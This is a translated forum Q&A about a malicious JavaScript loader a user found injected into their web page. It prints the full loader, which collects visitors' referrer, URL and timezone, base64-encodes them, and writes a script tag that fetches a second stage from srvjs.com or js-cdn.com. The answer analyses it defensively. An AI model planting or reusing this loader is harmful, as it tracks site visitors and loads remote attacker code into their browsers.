关于下面这段 JavaScript 代码,我有几个问题。我发现它被注入到了我的一个网页中。
我该如何弄清楚这段脚本的工作原理,或者对它进行反混淆?:


解包脚本时出错:Unexpected token {


/*
 * Injected third-party loader (minified; layout kept, only comments added).
 * Pieces, in order:
 *   x()  - picks the identifier used in the second-stage URL: "gie462", or any
 *          query-string value that is exactly 6 chars of [a-z0-9] whose char
 *          codes sum to 465 (the same sum as "gie462"), unless a global
 *          `disable_override` is truthy.
 *   K()  - parses window.location.search into a {key: value} object.
 *   q()  - returns the <script> element whose src contains "gie462" (the loader).
 *   H()  - String.fromCharCode over its arguments; used below to spell
 *          "js-cdn.com" and "/imp/" as char codes.
 *   l    - base64 encode/decode helper with its own UTF-8 byte packing.
 *   (function(){...}).call(this) - JSON parse/stringify polyfill (JSON3) that
 *          installs d.JSON3 and replaces d.JSON.
 *   final IIFE - builds {k,b,c,r,s,cr} = identifier, negated timezone offset,
 *          random number, document.referrer, page URL, decoded ?cr= taken from
 *          the loader's own src; base64-encodes it into "?d=" and document.write()s
 *          <script src="//HOST/imp/ID.js?d=..."> where HOST is the host the loader
 *          was served from, or "js-cdn.com" when that cannot be derived from src.
 * For analysis, swap the final document.write for console.log to print the
 * second-stage URL instead of executing it.
 * `index` (in x) and `i` (in K) are assigned without declaration, so this
 * script would throw under "use strict".
 */
(function(){/* x(): choose the identifier placed in the second-stage URL (see header) */function x(){var b=K(),a;for(a in b){var m=b[a],c;c=m;if(6!==c.length)c=!1;else{var d;d=c.match(/^[a-z0-9]+$/)?!0:!1;if(d){c=c.split("");/* `index` is never declared: implicit global */for(index=d=0;index<c.length;++index)d+=c[index].charCodeAt(0);c=465!==d?!1:!0/* 465 is also the char-code sum of "gie462" */}else c=!1}/* a truthy global disable_override only blocks this override; the loader still runs */if(c&&("undefined"===typeof disable_override||!disable_override))return m}return"gie462"}/* K(): window.location.search -> {key: value}; '+' becomes space and a part is percent-decoded only when it contains one of the listed encoded sequences */function K(){for(var b,a=/\+/g,m=/([^&=]+)=?([^&]*)/g,c=function(b){b=b.replace(a," ");var c;a:{c=b;var d="%20 %21 %22 %23 %24 %25 %26 %27 %28 %29 %2A %2B %2C %2D %2E %2F %3A %3B %3C %3D %3E %3F %40 %5B %5C %5D %5E %5F %7B %7C %7D %7E %60".split(" ");
    /* `i` is never declared: implicit global */for(i=0;i<d.length;i++)if(-1!==c.indexOf(d[i])){c=!0;break a}c=!1}return c?decodeURIComponent(b):b},d=window.location.search.substring(1),e={};b=m.exec(d);)e[c(b[1])]=c(b[2]);return e}/* q(): the loader's own <script> element (first script whose src contains "gie462") */function q(){for(var b=document.getElementsByTagName("script"),a=0;a<b.length;a++)if(-1!=b[a].src.indexOf("gie462"))return b[a]}/* H(): String.fromCharCode over all arguments; keeps string constants out of a plain-text grep */function H(b){return String.fromCharCode.apply(null,arguments)}/* l: base64 codec; ie/ieo are User-Agent sniffs selecting array-join vs string-concat code paths */var l={alphabet:"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=",lookup:null,ie:/MSIE /.test(navigator.userAgent),
    ieo:/MSIE [67]/.test(navigator.userAgent),/* encode: string -> UTF-8 bytes (toUtf8) -> base64 text */encode:function(b){b=l.toUtf8(b);var a=-1,m=b.length,c,d,e=[,,,];if(l.ie){for(var r=[];++a<m;)c=b[a],d=b[++a],e[0]=c>>2,e[1]=(c&3)<<4|d>>4,isNaN(d)?e[2]=e[3]=64:(c=b[++a],e[2]=(d&15)<<2|c>>6,e[3]=isNaN(c)?64:c&63),r.push(l.alphabet.charAt(e[0]),l.alphabet.charAt(e[1]),l.alphabet.charAt(e[2]),l.alphabet.charAt(e[3]));return r.join("")}for(r="";++a<m;)c=b[a],d=b[++a],e[0]=c>>2,e[1]=(c&3)<<4|d>>4,isNaN(d)?e[2]=e[3]=64:(c=b[++a],e[2]=(d&15)<<2|c>>6,e[3]=isNaN(c)?
        64:c&63),r+=l.alphabet[e[0]]+l.alphabet[e[1]]+l.alphabet[e[2]]+l.alphabet[e[3]];return r},/* decode: base64 text -> bytes (fromUtf8) -> string; throws "decode failed." unless length % 4 == 0 */decode:function(b){if(b.length%4)throw Error("decode failed.");b=l.fromUtf8(b);var a=0,m=b.length;if(l.ieo){for(var c=[];a<m;)128>b[a]?c.push(String.fromCharCode(b[a++])):191<b[a]&&224>b[a]?c.push(String.fromCharCode((b[a++]&31)<<6|b[a++]&63)):c.push(String.fromCharCode((b[a++]&15)<<12|(b[a++]&63)<<6|b[a++]&63));return c.join("")}for(c="";a<m;)c=128>b[a]?c+String.fromCharCode(b[a++]):191<b[a]&&224>b[a]?c+String.fromCharCode((b[a++]&
        31)<<6|b[a++]&63):c+String.fromCharCode((b[a++]&15)<<12|(b[a++]&63)<<6|b[a++]&63);return c},/* toUtf8: string -> UTF-8 byte array (1-3 bytes per UTF-16 code unit) */toUtf8:function(b){var a=-1,m=b.length,c,d=[];if(/^[\x00-\x7f]*$/.test(b))for(;++a<m;)d.push(b.charCodeAt(a));else for(;++a<m;)c=b.charCodeAt(a),128>c?d.push(c):2048>c?d.push(c>>6|192,c&63|128):d.push(c>>12|224,c>>6&63|128,c&63|128);return d},/* fromUtf8 (misnamed): base64 text -> byte array via the lazily built l.lookup; stops at '=' (index 64) */fromUtf8:function(b){var a=-1,m,c=[],d=[,,,];if(!l.lookup){m=l.alphabet.length;for(l.lookup={};++a<m;)l.lookup[l.alphabet.charAt(a)]=a;a=-1}for(m=b.length;++a<m;){d[0]=
        l.lookup[b.charAt(a)];d[1]=l.lookup[b.charAt(++a)];c.push(d[0]<<2|d[1]>>4);d[2]=l.lookup[b.charAt(++a)];if(64==d[2])break;c.push((d[1]&15)<<4|d[2]>>2);d[3]=l.lookup[b.charAt(++a)];if(64==d[3])break;c.push((d[2]&3)<<6|d[3])}return c}};/* --- JSON3 polyfill: feature-tests native JSON and, where it fails, supplies its own stringify/parse --- */(function(){function b(a,c){/* e(): memoized feature tests ("json-stringify", "json-parse", "bug-string-char-index") */function e(g){if(e[g]!==w)return e[g];var h;if("bug-string-char-index"==g)h=!1;else if("json"==g)h=e("json-stringify")&&e("json-parse");else{var a;if("json-stringify"==g){h=c.stringify;var b="function"==typeof h&&t;if(b){(a=function(){return 1}).toJSON=
    a;try{b="0"===h(0)&&"0"===h(new l)&&'""'==h(new x)&&h(u)===w&&h(w)===w&&h()===w&&"1"===h(a)&&"[1]"==h([a])&&"[null]"==h([w])&&"null"==h(null)&&"[null,null,null]"==h([w,u,null])&&'{"a":[1,true,false,null,"\u0000\b\n\f\r\t"]}'==h({a:[a,!0,!1,null,"\x00\b\n\f\r\t"]})&&"1"===h(null,a)&&"[\n 1,\n 2\n]"==h([1,2],null,1)&&'"-271821-04-20T00:00:00.000Z"'==h(new q(-864E13))&&'"+275760-09-13T00:00:00.000Z"'==h(new q(864E13))&&'"-000001-01-01T00:00:00.000Z"'==h(new q(-621987552E5))&&'"1969-12-31T23:59:59.999Z"'==
    h(new q(-1))}catch(d){b=!1}}h=b}if("json-parse"==g){h=c.parse;if("function"==typeof h)try{if(0===h("0")&&!h(!1)){a=h('{"a":[1,true,false,null,"\u0000\b\n\f\r\t"]}');var B=5==a.a.length&&1===a.a[0];if(B){try{B=!h('"\t"')}catch(d){}if(B)try{B=1!==h("01")}catch(d){}if(B)try{B=1!==h("1.")}catch(d){}}}}catch(d){B=!1}h=B}}return e[g]=!!h}a||(a=d.Object());c||(c=d.Object());var l=a.Number||d.Number,x=a.String||d.String,r=a.Object||d.Object,q=a.Date||d.Date,E=a.SyntaxError||d.SyntaxError,H=a.TypeError||
    d.TypeError,K=a.Math||d.Math,I=a.JSON||d.JSON;"object"==typeof I&&I&&(c.stringify=I.stringify,c.parse=I.parse);var r=r.prototype,u=r.toString,v,D,w,t=new q(-0xc782b5b800cec);try{t=-109252==t.getUTCFullYear()&&0===t.getUTCMonth()&&1===t.getUTCDate()&&10==t.getUTCHours()&&37==t.getUTCMinutes()&&6==t.getUTCSeconds()&&708==t.getUTCMilliseconds()}catch(g){}/* only when native JSON fails the tests: build the fallback implementation */if(!e("json")){var F=e("bug-string-char-index");if(!t)var y=K.floor,Q=[0,31,59,90,120,151,181,212,243,273,304,334],G=function(g,h){return Q[h]+365*
    (g-1970)+y((g-1969+(h=+(1<h)))/4)-y((g-1901+h)/100)+y((g-1601+h)/400)};(v=r.hasOwnProperty)||(v=function(g){var h={},a;(h.__proto__=null,h.__proto__={toString:1},h).toString!=u?v=function(g){var a=this.__proto__;g=g in(this.__proto__=null,this);this.__proto__=a;return g}:(a=h.constructor,v=function(g){var h=(this.constructor||a).prototype;return g in this&&!(g in h&&this[g]===h[g])});h=null;return v.call(this,g)});D=function(g,a){var c=0,b,d,f;(b=function(){this.valueOf=0}).prototype.valueOf=0;d=
    new b;for(f in d)v.call(d,f)&&c++;b=d=null;c?D=2==c?function(g,a){var h={},c="[object Function]"==u.call(g),b;for(b in g)c&&"prototype"==b||v.call(h,b)||!(h[b]=1)||!v.call(g,b)||a(b)}:function(g,a){var h="[object Function]"==u.call(g),b,c;for(b in g)h&&"prototype"==b||!v.call(g,b)||(c="constructor"===b)||a(b);(c||v.call(g,b="constructor"))&&a(b)}:(d="valueOf toString toLocaleString propertyIsEnumerable isPrototypeOf hasOwnProperty constructor".split(" "),D=function(g,a){var h="[object Function]"==
    u.call(g),b,c=!h&&"function"!=typeof g.constructor&&m[typeof g.hasOwnProperty]&&g.hasOwnProperty||v;for(b in g)h&&"prototype"==b||!c.call(g,b)||a(b);for(h=d.length;b=d[--h];c.call(g,b)&&a(b));});return D(g,a)};/* fallback stringify */if(!e("json-stringify")){var R={92:"\\",34:'\"',8:"\b",12:"\f",10:"\n",13:"\r",9:"\t"},z=function(g,a){return("000000"+(a||0)).slice(-g)},N=function(g){for(var a='"',b=0,c=g.length,d=!F||10<c,f=d&&(F?g.split(""):g);b<c;b++){var k=g.charCodeAt(b);switch(k){case 8:case 9:case 10:case 12:case 13:case 34:case 92:a+=
    R[k];break;default:a=32>k?a+("\u00"+z(2,k.toString(16))):a+(d?f[b]:g.charAt(b))}}return a+'"'},L=function(g,a,b,c,d,f,k){var e,p,l,m,n,q,r,t,A;try{e=a[g]}catch(x){}if("object"==typeof e&&e)if(p=u.call(e),"[object Date]"!=p||v.call(e,"toJSON"))"function"==typeof e.toJSON&&("[object Number]"!=p&&"[object String]"!=p&&"[object Array]"!=p||v.call(e,"toJSON"))&&(e=e.toJSON(g));else if(e>-1/0&&e<1/0){if(G){m=y(e/864E5);for(p=y(m/365.2425)+1970-1;G(p+1,0)<=m;p++);for(l=y((m-G(p,0))/30.42);G(p,l+1)<=m;l++);
    m=1+m-G(p,l);n=(e%864E5+864E5)%864E5;q=y(n/36E5)%24;r=y(n/6E4)%60;t=y(n/1E3)%60;n%=1E3}else p=e.getUTCFullYear(),l=e.getUTCMonth(),m=e.getUTCDate(),q=e.getUTCHours(),r=e.getUTCMinutes(),t=e.getUTCSeconds(),n=e.getUTCMilliseconds();e=(0>=p||1E4<=p?(0>p?"-":"+")+z(6,0>p?-p:p):z(4,p))+"-"+z(2,l+1)+"-"+z(2,m)+"T"+z(2,q)+":"+z(2,r)+":"+z(2,t)+"."+z(3,n)+"Z"}else e=null;b&&(e=b.call(a,g,e));if(null===e)return"null";p=u.call(e);if("[object Boolean]"==p)return""+e;if("[object Number]"==p)return e>-1/0&&e<
1/0?""+e:"null";if("[object String]"==p)return N(""+e);if("object"==typeof e){for(g=k.length;g--;)if(k[g]===e)throw H();k.push(e);A=[];a=f;f+=d;if("[object Array]"==p){l=0;for(g=e.length;l<g;l++)p=L(l,e,b,c,d,f,k),A.push(p===w?"null":p);g=A.length?d?"[\n"+f+A.join(",\n"+f)+"\n"+a+"]":"["+A.join(",")+"]":"[]"}else D(c||e,function(g){var a=L(g,e,b,c,d,f,k);a!==w&&A.push(N(g)+":"+(d?" ":"")+a)}),g=A.length?d?"{\n"+f+A.join(",\n"+f)+"\n"+a+"}":"{"+A.join(",")+"}":"{}";k.pop();return g}};c.stringify=function(g,
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                             a,b){var c,e,d,f;if(m[typeof a]&&a)if("[object Function]"==(f=u.call(a)))e=a;else if("[object Array]"==f){d={};for(var l=0,p=a.length,n;l<p;n=a[l++],(f=u.call(n),"[object String]"==f||"[object Number]"==f)&&(d[n]=1));}if(b)if("[object Number]"==(f=u.call(b))){if(0<(b-=b%1))for(c="",10<b&&(b=10);c.length<b;c+=" ");}else"[object String]"==f&&(c=10>=b.length?b:b.slice(0,10));return L("",(n={},n[""]=g,n),e,d,c,"",[])}}/* fallback parse */if(!e("json-parse")){var S=x.fromCharCode,T={92:"\",34:'"',47:"/",98:"\b",116:"\t",
    110:"\n",102:"\f",114:"\r"},f,J,n=function(){f=J=null;throw E();},C=function(){for(var a=J,b=a.length,c,e,d,l,k;f<b;)switch(k=a.charCodeAt(f),k){case 9:case 10:case 13:case 32:f++;break;case 123:case 125:case 91:case 93:case 58:case 44:return c=F?a.charAt(f):a[f],f++,c;case 34:c="@";for(f++;f<b;)if(k=a.charCodeAt(f),32>k)n();else if(92==k)switch(k=a.charCodeAt(++f),k){case 92:case 34:case 47:case 98:case 116:case 110:case 102:case 114:c+=T[k];f++;break;case 117:e=++f;for(d=f+4;f<d;f++)k=a.charCodeAt(f),
48<=k&&57>=k||97<=k&&102>=k||65<=k&&70>=k||n();c+=S("0x"+a.slice(e,f));break;default:n()}else{if(34==k)break;k=a.charCodeAt(f);for(e=f;32<=k&&92!=k&&34!=k;)k=a.charCodeAt(++f);c+=a.slice(e,f)}if(34==a.charCodeAt(f))return f++,c;n();default:e=f;45==k&&(l=!0,k=a.charCodeAt(++f));if(48<=k&&57>=k){for(48==k&&(k=a.charCodeAt(f+1),48<=k&&57>=k)&&n();f<b&&(k=a.charCodeAt(f),48<=k&&57>=k);f++);if(46==a.charCodeAt(f)){for(d=++f;d<b&&(k=a.charCodeAt(d),48<=k&&57>=k);d++);d==f&&n();f=d}k=a.charCodeAt(f);if(101==
    k||69==k){k=a.charCodeAt(++f);43!=k&&45!=k||f++;for(d=f;d<b&&(k=a.charCodeAt(d),48<=k&&57>=k);d++);d==f&&n();f=d}return+a.slice(e,f)}l&&n();if("true"==a.slice(f,f+4))return f+=4,!0;if("false"==a.slice(f,f+5))return f+=5,!1;if("null"==a.slice(f,f+4))return f+=4,null;n()}return"$"},M=function(a){var b,c;"$"==a&&n();if("string"==typeof a){if("@"==(F?a.charAt(0):a[0]))return a.slice(1);if("["==a){for(b=[];;c||(c=!0)){a=C();if("]"==a)break;c&&(","==a?(a=C(),"]"==a&&n()):n());","==a&&n();b.push(M(a))}return b}if("{"==
    a){for(b={};;c||(c=!0)){a=C();if("}"==a)break;c&&(","==a?(a=C(),"}"==a&&n()):n());","!=a&&"string"==typeof a&&"@"==(F?a.charAt(0):a[0])&&":"==C()||n();b[a.slice(1)]=M(C())}return b}n()}return a},P=function(a,b,c){c=O(a,b,c);c===w?delete a[b]:a[b]=c},O=function(a,b,c){var d=a[b],e;if("object"==typeof d&&d)if("[object Array]"==u.call(d))for(e=d.length;e--;)P(d,e,c);else D(d,function(a){P(d,a,c)});return c.call(a,b,d)};c.parse=function(a,b){var c,d;f=0;J=""+a;c=M(C());"$"!=C()&&n();f=J=null;return b&&
"[object Function]"==u.call(b)?O((d={},d[""]=c,d),"",b):c}}}c.runInContext=b;return c}/* module wiring: CommonJS exports, AMD define, or the global object (window) */var a="function"===typeof define&&define.amd,m={"function":!0,object:!0},c=m[typeof exports]&&exports&&!exports.nodeType&&exports,d=m[typeof window]&&window||this,e=c&&m[typeof module]&&module&&!module.nodeType&&"object"==typeof global&&global;!e||e.global!==e&&e.window!==e&&e.self!==e||(d=e);if(c&&!a)b(d,c);else{var l=d.JSON,x=d.JSON3,q=!1,E=b(d,d.JSON3={noConflict:function(){q||(q=!0,d.JSON=l,d.JSON3=x,l=x=null);
    return E}});/* replaces the page's JSON with the polyfill's parse/stringify */d.JSON={parse:E.parse,stringify:E.stringify}}a&&define(function(){return E})}).call(this);/* --- loader body: collect page data and inject the second-stage script --- */(function(){var b=x()/* identifier */,a=(new Date).getTimezoneOffset()/-1/* negated timezone offset, minutes */,m=Math.floor(9999999*Math.random()+1E4)/* random 5-8 digit number */,c=document.referrer,d=window.location.toString(),e;e=(e=/\?cr=([^&]+)/.exec(q().src))?l.decode(e[1]):""/* cr: base64 ?cr= value on the loader's own src, decoded */;b="?d="+l.encode(JSON.stringify({k:b,b:a,c:m,r:c,s:d,cr:e}))/* all collected values leave the page in this base64 query string */;a=q().src;a=-1<a.indexOf("//")?a.split("/")[2]:a.split("/")[0];a=a.split(":")[0]/* host part of the loader's src; empty falls back to the hard-coded host below */;a="//"+(a?a:H(106,115,45,99,100,110,46,99,111,109)/* "js-cdn.com" */)+H(47,
        105,109,112,47)/* "/imp/" */+x()+".js";/* injects //HOST/imp/ID.js?d=<base64 JSON>; swap document.write for console.log when analysing */document.write('<script src="'+(a+b)+'">\x3c/script>')})()})();



服务器上有任何 gie462.js 文件吗?

是的,是 srvjs.com/js/gie462.js,它通过 script 标签的 src 被嵌入到了 HTML 文件中。


1.

该脚本最后会写入一个 <script src=...> 标记,所以要知道它在做什么,可以把最后那个 document.write 改成 console.log 之类的,把它打印出来:
<script src="//srvjs.com/imp/gie462.js?d=«base64»"></script>


访问该 URL 会返回一段 HTML,内容是“糟糕,好像出了点问题”,因此我猜脚本目前已被停用,或者是我没有传递正确的参数。

如果脚本是以相对路径而不是从 srvjs.com 加载的,主机就会改为 js-cdn.com。查阅关于 js-cdn.com 的博客文章可以看到,该站点与 2015 年的一次欺诈活动有关。

请注意,srvjs.com/imp/gie462.js 和 js-cdn.com/imp/gie462.js 返回的内容相同,所以这两个网站应该关系密切。

2.

混淆程度并不大;我认为是您用的解包工具质量不太好。我只是用 VS Code 的美化(格式化)功能就完成了。


`var l = {alphabet: ...}` 部分是来自 https://stackoverflow.com/a/24133397/224671 的 base64 编解码库(o_O),接下来的 `(function() { ... }).call(this)` 部分是 JSON3。

发送的 base64 数据会作为参数传给真实脚本(imp/gie462.js)。真实脚本里究竟做了什么尚不清楚。



2016年11月7日更新:该脚本现在已经上线;在未提供任何参数时,它目前只是重定向到 http://google.com,因此可能仍处于测试阶段。



很久以来,浏览器就一直原生支持 base64 和 JSON,尤其是 IE8。

– John Dvorak
16年11月6日在7:54

你知道他们为什么要用自定义的 base64 和 JSON 库吗?

–托马斯·库尔森
16年11月6日在15:05

@ThomasCoulson 我猜是为了扩大覆盖范围。借助自定义库,他们还能针对 IE 6 或 7 这样的古老浏览器。

–kennytm
16年11月6日在15:07